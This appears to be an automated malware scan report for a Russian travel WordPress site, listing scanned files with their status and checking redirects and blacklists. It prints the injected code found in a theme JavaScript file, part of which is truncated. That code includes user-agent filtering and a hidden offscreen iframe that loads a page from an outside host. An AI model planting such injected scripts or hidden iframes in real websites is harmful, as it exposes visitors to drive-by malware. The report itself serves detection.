Scanned pages/files
Request | Server response | Status |
http://turistos-master.ru/ | 200 OK Content-Length: 55601 Content-Type: text/html | clean |
http://turistos-master.ru/wp-content/themes/tree-house/dhtml.js | 200 OK Content-Length: 2255 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(){
function stripos (f_haystack, f_needle, f_offset) {
    var haystack = (f_haystack + '').toLowerCase();
    var needle = (f_needle + '').toLowerCase();
    var index = 0;
    if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; }
    return false;
}
function ffff_listier_ua(){ var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire } } })();
navHover = function() {
    var lis = document.getElementById("nav").getElementsByTagName("LI");
    for (var i=0; i<lis.length; i++) {
        lis[i].onmouseover=function() { this.className+=" iehover"; }
        lis[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" iehover\\b"), ""); }
    }
}
if (window.attachEvent) window.attachEvent("onload", navHover);
Decoded script:
function () {
    var lis = document.getElementById("nav").getElementsByTagName("LI");
    for (var i = 0; i < lis.length; i++) {
        lis[i].onmouseover = function () {this.className += " iehover";};
        lis[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" iehover\\b"), "");};
    }
}
<iframe src="http://scsczero.hycrete.com.br/jtrsdhtrjtydkytk8.html" style="position:absolute;left:-1309px;top:-1309px;" height="175" width="175" name="Anatoli"></iframe>
Antivirus reports:
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://turistos-master.ru/?feed=rss2 | 200 OK Content-Length: 41019 Content-Type: text/html | clean |
http://turistos-master.ru/wp-content/uploads/2013/02/mardi_gras_019.jpg | 200 OK Content-Length: 62716 Content-Type: image/jpeg | clean |
http://turistos-master.ru/test404page.js | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
http://turistos-master.ru/wp-content/uploads/2012/12/sydney-aquarium.jpg | 200 OK Content-Length: 228334 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/12/1271101015_1271084929_1271008531_pink-lake-01.jpg | 200 OK Content-Length: 68229 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/09/39078737_1233590153_1656.jpg | 200 OK Content-Length: 84628 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/09/be7b5c4a7132525444394bae0bd7d66b585120111136843.jpg | 200 OK Content-Length: 62374 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/09/12688929551220717740_0_5.jpg | 200 OK Content-Length: 45215 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/09/argyle_cove.jpg | 200 OK Content-Length: 91540 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/09/queen-victoria-building-sydney-ipoh-garden-berhad3.jpg | 200 OK Content-Length: 196138 Content-Type: image/jpeg | clean |
http://turistos-master.ru/wp-content/uploads/2012/08/stud.png | 200 OK Content-Length: 300084 Content-Type: image/png | clean |
http://turistos-master.ru/wp-content/uploads/2012/08/1.jpg | 200 OK Content-Length: 57625 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: turistos-master.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Sat, 04 Oct 2014 08:18:34 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 55601
Content-Type: text/html;charset=utf-8
Expires: Tue, 07 Oct 2014 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 00:00:00 GMT
X-Powered-By: PHP/5.2.17
...55601 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: turistos-master.ru
Referer: http://www.google.com/search?q=turistos-master.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=turistos-master.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://turistos-master.ru/
Result: turistos-master.ru is not infected or malware details are not published yet.